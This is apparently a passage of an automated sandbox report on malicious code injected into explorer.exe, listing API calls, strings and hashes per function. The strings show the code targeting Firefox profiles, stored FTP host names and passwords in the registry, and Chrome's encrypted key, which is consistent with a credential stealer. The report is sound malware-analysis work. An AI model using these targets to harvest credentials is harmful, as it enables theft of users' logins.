                                                                                  • StrStrIW.SHLWAPI(00000000,Profile), ref: 00122EB5
                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,Path,00176388,?,00000FFF,?), ref: 00122ED8
                                                                                  • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00122EEB
                                                                                  • lstrlenW.KERNEL32(00000000), ref: 00122F48
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                  • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                  • API String ID: 2234428054-4107377610
                                                                                  • Opcode ID: def90236fab55717409a4ceb52e5534cc0b546a7eb9ff47dacd027c2d17ea57c
                                                                                  • Instruction ID: 5e0fae2b279831c5b7884ff1f2a11fc3ef206b807805031d1fec27c978df0d39
                                                                                  • Opcode Fuzzy Hash: def90236fab55717409a4ceb52e5534cc0b546a7eb9ff47dacd027c2d17ea57c
                                                                                  • Instruction Fuzzy Hash: 16318030704321ABC725EF30A95163F76B2EFE5700F10442DF90AA7292DB758CA69752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00121BAD: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121BE6
                                                                                    • Part of subcall function 00121BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C04
                                                                                    • Part of subcall function 00121BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C3D
                                                                                    • Part of subcall function 00121BAD: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121C60
                                                                                    • Part of subcall function 0012463A: lstrlenW.KERNEL32(?), ref: 00124653
                                                                                    • Part of subcall function 0012463A: lstrlenW.KERNEL32(?), ref: 0012469D
                                                                                    • Part of subcall function 0012463A: lstrlenW.KERNEL32(?), ref: 001246A5
                                                                                  • wsprintfW.USER32 ref: 001247B5
                                                                                  • wsprintfW.USER32 ref: 001247C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                  • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                  • API String ID: 2889301010-4273187114
                                                                                  • Opcode ID: f573412e1a599db21ce0d256510c334fd5e560e2a79b6e9229c5d2dba2b1b872
                                                                                  • Instruction ID: 81cd25e17f0289c2a39cc2e191d2c5e4ebe5806ee6917706a5568cecc65754ea
                                                                                  • Opcode Fuzzy Hash: f573412e1a599db21ce0d256510c334fd5e560e2a79b6e9229c5d2dba2b1b872
                                                                                  • Instruction Fuzzy Hash: 2C3122317047646BC710EB25EC50C2BB6FDEFEA748F06492DB05497241DBB2DC2287A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memcpy.NTDLL(?,?,?,?,00000000), ref: 0012F940
                                                                                  • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0012F95B
                                                                                  • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0012F96E
                                                                                  • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0012F9A3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: -journal$-wal$immutable$nolock
                                                                                  • API String ID: 3510742995-3408036318
                                                                                  • Opcode ID: 4a1a954f7bba8cb63645d703257853323a0a36f16ec96d8589b79a173a098024
                                                                                  • Instruction ID: d9c3e27f2a023b1bd7b6f85646fed6443661d8bc20aee4f8169f8a2ac61bbedf
                                                                                  • Opcode Fuzzy Hash: 4a1a954f7bba8cb63645d703257853323a0a36f16ec96d8589b79a173a098024
                                                                                  • Instruction Fuzzy Hash: 27D1D3B1A083518FC714DF24D891B1ABBF1AF95314F18897DF8998B382DB74D816CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %$-x0$NaN
                                                                                  • API String ID: 0-62881354
                                                                                  • Opcode ID: 56e4483c606ac320ae1b52aa1baf7e21d8e2acd7b4c2061f95c59413d0c01456
                                                                                  • Instruction ID: 43e169a717ee05158c6200f11a31f20780c2c3f8d56e254de8a66737881f3645
                                                                                  • Opcode Fuzzy Hash: 56e4483c606ac320ae1b52aa1baf7e21d8e2acd7b4c2061f95c59413d0c01456
                                                                                  • Instruction Fuzzy Hash: 41D1E13460C3A28FD729CB28A4A037BBBE1AF96304F29485DF4C5972D2D764CDA5C742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -x0$NaN
                                                                                  • API String ID: 0-3447725786
                                                                                  • Opcode ID: 9efb8d9dfdc2573a8bfbfbd98403d701313eb865451844ddef069bcb98973d01
                                                                                  • Instruction ID: abf6137891a7ae782765716b0c35c0f2065329f9c0ff4e20801abed594548176
                                                                                  • Opcode Fuzzy Hash: 9efb8d9dfdc2573a8bfbfbd98403d701313eb865451844ddef069bcb98973d01
                                                                                  • Instruction Fuzzy Hash: 0BE1F03060C3A28FDB298B28A46037BBBE1AF96304F29495DF8C5972D1D760CDA5C752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -x0$NaN
                                                                                  • API String ID: 0-3447725786
                                                                                  • Opcode ID: e8ca3e3f3da4e4a55ff2340ee9a5a8d242610a8e45bbd2dcb7bd3de5064f8836
                                                                                  • Instruction ID: 837e9bc9feb95f96dd941f2c53f79a72685baca07ec479b99b04d68a26ca40e1
                                                                                  • Opcode Fuzzy Hash: e8ca3e3f3da4e4a55ff2340ee9a5a8d242610a8e45bbd2dcb7bd3de5064f8836
                                                                                  • Instruction Fuzzy Hash: 40E1E13460C3A28BD729CB28E4A072BBBE1AF96304F29485DF4C5973D2D764CDA5C752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -x0$NaN
                                                                                  • API String ID: 0-3447725786
                                                                                  • Opcode ID: aa2f15956d9ac7c2331ab77a6053b8dbba1231873e1df7028015213b76cec497
                                                                                  • Instruction ID: aa58787b514dbd917370a5fefe4c6f154a6bad2bf57b294ddcf4bc323e0d91ca
                                                                                  • Opcode Fuzzy Hash: aa2f15956d9ac7c2331ab77a6053b8dbba1231873e1df7028015213b76cec497
                                                                                  • Instruction Fuzzy Hash: DFE1E13460C3A28BDB25CB28E4A033BBBE1AF96304F29495DF4C5972D2D764CDA5C752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -x0$NaN
                                                                                  • API String ID: 0-3447725786
                                                                                  • Opcode ID: 6b9ffdf83987d5002f3a21967fec0a5bfe0ceb76917b602caeea9ac6d74b1cd3
                                                                                  • Instruction ID: 978334a049583e245749d40f64e325a7afaaa1a77e77f3118fd9995fe6fc5ec2
                                                                                  • Opcode Fuzzy Hash: 6b9ffdf83987d5002f3a21967fec0a5bfe0ceb76917b602caeea9ac6d74b1cd3
                                                                                  • Instruction Fuzzy Hash: A4E1D07460C3A28FD729CB28A4A033BBBE1AF96304F29485DF4C5973D2D764C9A5C752
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0012701C
                                                                                  • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00127034
                                                                                  • _aulldvrm.NTDLL(00000000,00000000,?), ref: 00127089
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _aulldvrm$_aullrem
                                                                                  • String ID: -x0$NaN
                                                                                  • API String ID: 105165338-3447725786
                                                                                  • Opcode ID: 660328a5d952077f6f0577ba7a566cd6c081ee6fe37cbff99deb123a96f72e71
                                                                                  • Instruction ID: 5dcf643977b9db39869583293b5fe4323dd2c8d643b0945e09b23d9764115abc
                                                                                  • Opcode Fuzzy Hash: 660328a5d952077f6f0577ba7a566cd6c081ee6fe37cbff99deb123a96f72e71
                                                                                  • Instruction Fuzzy Hash: 97D1D13460C3A28BD7258B28A4A037BBBE1AF96304F29485DF4C5973D2D764CDA5C742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 001288BB
                                                                                  • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00128974
                                                                                  • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00128AA9
                                                                                  • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00128ABC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _allmul$_alldvrm
                                                                                  • String ID: .
                                                                                  • API String ID: 115548886-248832578
                                                                                  • Opcode ID: b057778921f2420cf628fbbdc8258c8dfb48a9ce3512517d2352b3f04a1d9c30
                                                                                  • Instruction ID: 604e82415dfcc82fccad2a58620667fb6759fb444371881a45dce54e0041b11e
                                                                                  • Opcode Fuzzy Hash: b057778921f2420cf628fbbdc8258c8dfb48a9ce3512517d2352b3f04a1d9c30
                                                                                  • Instruction Fuzzy Hash: E7D1F2B190E7A58BC724DF48A88023ABBF0FBD5314F154D5EF5C983281DBB0C9658B86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: ,$7$9
                                                                                  • API String ID: 2221118986-1653249994
                                                                                  • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                  • Instruction ID: 275e8234f753941fa0a952e59bd80d30564bbaa8f394d43b44ebf65fddb3501e
                                                                                  • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                  • Instruction Fuzzy Hash: A931AF715083449FD760DF60D440B8FBBE8AF95340F00892EF98987261EBB1A648CBA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(00000000,00000000,?,00122FE5,PathToExe,00000000,00000000), ref: 00121D94
                                                                                  • StrStrIW.SHLWAPI(00000000,.exe), ref: 00121DB8
                                                                                  • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00121DCD
                                                                                  • lstrlenW.KERNEL32(00000000,?,00122FE5,PathToExe,00000000,00000000), ref: 00121DE4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: .exe
                                                                                  • API String ID: 1659193697-4119554291
                                                                                  • Opcode ID: 58ca4ee4bd6c4a073bd7a046d7f63bfb53bf56bfad8a24871effec5b4db011bb
                                                                                  • Instruction ID: 2f4f7b34280cee633e5a35dacaa7a08d73f5b60db527640fb9a26222b9853e09
                                                                                  • Opcode Fuzzy Hash: 58ca4ee4bd6c4a073bd7a046d7f63bfb53bf56bfad8a24871effec5b4db011bb
                                                                                  • Instruction Fuzzy Hash: 93F0AF21210A24EAD364ABB8AC88AAA22B5EF11341730482DE146C2162EB608D908799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00122297
                                                                                  • _alldiv.NTDLL(?,?,00989680,00000000), ref: 001222AA
                                                                                  • wsprintfA.USER32 ref: 001222BF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                  • String ID: %li
                                                                                  • API String ID: 4120667308-1021419598
                                                                                  • Opcode ID: 2dec95fe840940deef614ea092cbeb42eccc8420b7ca84d17ad2808f86cd0f08
                                                                                  • Instruction ID: 8cd8717c8cc31f518b5e834224c94677c09b187f7bb65b389b9f4c8d60fda1bf
                                                                                  • Opcode Fuzzy Hash: 2dec95fe840940deef614ea092cbeb42eccc8420b7ca84d17ad2808f86cd0f08
                                                                                  • Instruction Fuzzy Hash: 45E0D832A4021877C7103BB8AC0AEEF7F7DCB40B55F404291F508B2596D6728AA443D5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _allmul.NTDLL(?,00000000,00000018), ref: 00132F7D
                                                                                  • _allmul.NTDLL(-00000001,00000000,?,?), ref: 00132FE0
                                                                                  • _alldiv.NTDLL(?,?,00000000), ref: 001330EC
                                                                                  • _allmul.NTDLL(00000000,?,00000000), ref: 001330F5
                                                                                  • _allmul.NTDLL(?,00000000,?,?), ref: 001331A0
                                                                                    • Part of subcall function 001314DB: memset.NTDLL ref: 00131539
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _allmul$_alldivmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3880648599-0
                                                                                  • Opcode ID: 7ef47fc668faa9e6e06c1daf7cac206b2d749bdd159507beec1f408dca66eefd
                                                                                  • Instruction ID: c2d4f0fdac26fff2648cbd90784cbb5c0004473eb2ff45106139e43c4d389b49
                                                                                  • Opcode Fuzzy Hash: 7ef47fc668faa9e6e06c1daf7cac206b2d749bdd159507beec1f408dca66eefd
                                                                                  • Instruction Fuzzy Hash: 17D19871A083019BDB24DF68C880B6ABBE5AF98700F14492DF9A993291D770DE45CB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FOREIGN KEY constraint failed$new$old
                                                                                  • API String ID: 0-384346570
                                                                                  • Opcode ID: b50dd863495eb21f5fd3bbb888b6444e7c5651c3b420e56ab920b920e3d144a7
                                                                                  • Instruction ID: cd8b702095e9f64a928f66e15a520211b626b9f64e50a3be8304eb488c777c05
                                                                                  • Opcode Fuzzy Hash: b50dd863495eb21f5fd3bbb888b6444e7c5651c3b420e56ab920b920e3d144a7
                                                                                  • Instruction Fuzzy Hash: F0D145706483409FD718DF24C881B2FBBEAEBD8750F10881EF9999B291DB74D945CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 001294F5
                                                                                  • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00129515
                                                                                  • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00129547
                                                                                  • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0012957A
                                                                                  • _allmul.NTDLL(?,?,?,?), ref: 001295A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _alldiv$_allmul
                                                                                  • String ID:
                                                                                  • API String ID: 4215241517-0
                                                                                  • Opcode ID: 97dfc073b1665f99dfeb2b41876dcd2bae1185b92df318f30991af3e88d5cb3d
                                                                                  • Instruction ID: e27f2ee9d6d5ae0ef354f22765806e410f07e93e7bb2289ae701b3c7c05ca557
                                                                                  • Opcode Fuzzy Hash: 97dfc073b1665f99dfeb2b41876dcd2bae1185b92df318f30991af3e88d5cb3d
                                                                                  • Instruction Fuzzy Hash: 72214C317087715AD7375E1E7C81B2B7699DBE53A0F34412FFC0AD6152F7518C208165
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • _allmul.NTDLL(?,00000000,00000000), ref: 0013AFC1
                                                                                  • _alldvrm.NTDLL(?,?,00000000), ref: 0013B01D
                                                                                  • _allrem.NTDLL(?,00000000,?,?), ref: 0013B098
                                                                                  • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0013B0A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _alldvrm_allmul_allremmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1484705121-0
                                                                                  • Opcode ID: e8afa76b6a191bd5df26c5ea9e4fbff8cffe4eab91b4adbab092f8e8b774ce46
                                                                                  • Instruction ID: ee57750b08800dfebd6ef469efcaf66b88ec6eebdc6a18b1057f2fe250726828
                                                                                  • Opcode Fuzzy Hash: e8afa76b6a191bd5df26c5ea9e4fbff8cffe4eab91b4adbab092f8e8b774ce46
                                                                                  • Instruction Fuzzy Hash: CE4108716083419FC718EF19C89192BBBE6AFD8740F04892DF99997252EB71EC05CB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121BE6
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C04
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121C3D
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA,PortNumber,00000000,00000000), ref: 00121C60
                                                                                    • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121CAA), ref: 00121020
                                                                                    • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                  • String ID:
                                                                                  • API String ID: 217796345-0
                                                                                  • Opcode ID: e024dbe381e50e77487351d28cb660a3ee2bb933839e2dc702ee07d3cdbe4c52
                                                                                  • Instruction ID: b30ae3dc05030780438f2210f62601197501b16739e1f6da6fbc98cdb4662f7d
                                                                                  • Opcode Fuzzy Hash: e024dbe381e50e77487351d28cb660a3ee2bb933839e2dc702ee07d3cdbe4c52
                                                                                  • Instruction Fuzzy Hash: 7421D1762443147FE725CA21EC44F3BB7E9FBE8754F04092DF88AA2140DB20CD648721
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: _alldiv_allmul
                                                                                  • String ID: winTruncate1$winTruncate2
                                                                                  • API String ID: 727729158-470713972
                                                                                  • Opcode ID: 4ba4e3f3405d176c22d0973f8da31f59cc5ed2a202c653b4305ee47115b72ab6
                                                                                  • Instruction ID: fe8c646117b014d692807b9bb25bb2917a0579baec22a9d111d55e719248d558
                                                                                  • Opcode Fuzzy Hash: 4ba4e3f3405d176c22d0973f8da31f59cc5ed2a202c653b4305ee47115b72ab6
                                                                                  • Instruction Fuzzy Hash: 4C21D772200220ABDB149F1DDC85E6B77ADEF84710F958159FD18DB195D774DC20CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetHGlobalFromStream.OLE32(?,?), ref: 00121A6F
                                                                                  • GlobalFix.KERNEL32(00124965), ref: 00121A7E
                                                                                  • GlobalUnWire.KERNEL32(?), ref: 00121ABC
                                                                                    • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,00121215,?,?,00000001,00000000,?), ref: 00121003
                                                                                    • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00121AB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
                                                                                  • String ID:
                                                                                  • API String ID: 2207111602-0
                                                                                  • Opcode ID: 08b9f4e8b4eadef9f8771fc3bf3a71ee659a6221857fca1969e981b6cfd79113
                                                                                  • Instruction ID: 09420cfce811208bf3c03ba1c2b39354f757f69c75384284669662a9277f6eba
                                                                                  • Opcode Fuzzy Hash: 08b9f4e8b4eadef9f8771fc3bf3a71ee659a6221857fca1969e981b6cfd79113
                                                                                  • Instruction Fuzzy Hash: 8101AD32601761BF8B01DF25AC5889FBBF9AFA0350B14853EF80983220DF31C9A48B20
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0012307C), ref: 00121B3B
                                                                                  • lstrlenW.KERNEL32(00176574,?,?,0012307C), ref: 00121B40
                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00121B58
                                                                                  • lstrcatW.KERNEL32(00000000,00176574), ref: 00121B5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1475610065-0
                                                                                  • Opcode ID: 748abdc025290cbb9c26ed6f716d0a5eec7b2c174284debf19b4d928342a6d8b
                                                                                  • Instruction ID: 4320f4aacab4cb42b7ab7b5553fb0082da82f12a5f51cd7ffdbbcf366c437dcc
                                                                                  • Opcode Fuzzy Hash: 748abdc025290cbb9c26ed6f716d0a5eec7b2c174284debf19b4d928342a6d8b
                                                                                  • Instruction Fuzzy Hash: A7E09B6630032D2B4724B7AE6C94DBB77BCCBE56A53150139FA08D3302FE55DC1586B0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00123131
                                                                                  • lstrlen.KERNEL32("encrypted_key":",?,00123DB6), ref: 0012313E
                                                                                  • StrStrIA.SHLWAPI("encrypted_key":",0017693C), ref: 0012314D
                                                                                    • Part of subcall function 00121AD3: lstrlen.KERNEL32(?,?,?,?,00000000,001228F3), ref: 00121AF3
                                                                                    • Part of subcall function 00121AD3: lstrlen.KERNEL32(00000000,?,?,?,00000000,001228F3), ref: 00121AF8
                                                                                    • Part of subcall function 00121AD3: lstrcat.KERNEL32(00000000,?), ref: 00121B0E
                                                                                    • Part of subcall function 00121AD3: lstrcat.KERNEL32(00000000,00000000), ref: 00121B12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000010.00000002.1048541921.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_16_2_121000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$lstrcat
                                                                                  • String ID: "encrypted_key":"
                                                                                  • API String ID: 493641738-877455259
                                                                                  • Opcode ID: 7460d71c6a4ccd2dcd8715b382e9c44c9b9a426c53f321a56434c049a0bb66e2
                                                                                  • Instruction ID: c052d7cc3d5ac6ed78c81607c2d977a016edc098e4ee532493ed017187524b92
                                                                                  • Opcode Fuzzy Hash: 7460d71c6a4ccd2dcd8715b382e9c44c9b9a426c53f321a56434c049a0bb66e2
                                                                                  • Instruction Fuzzy Hash: 0DE06822B0AF742FC321ABFA3C488877B2C9F426103444078F108D3513DF9A8990CAE0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0012688F: memset.NTDLL ref: 001268AA
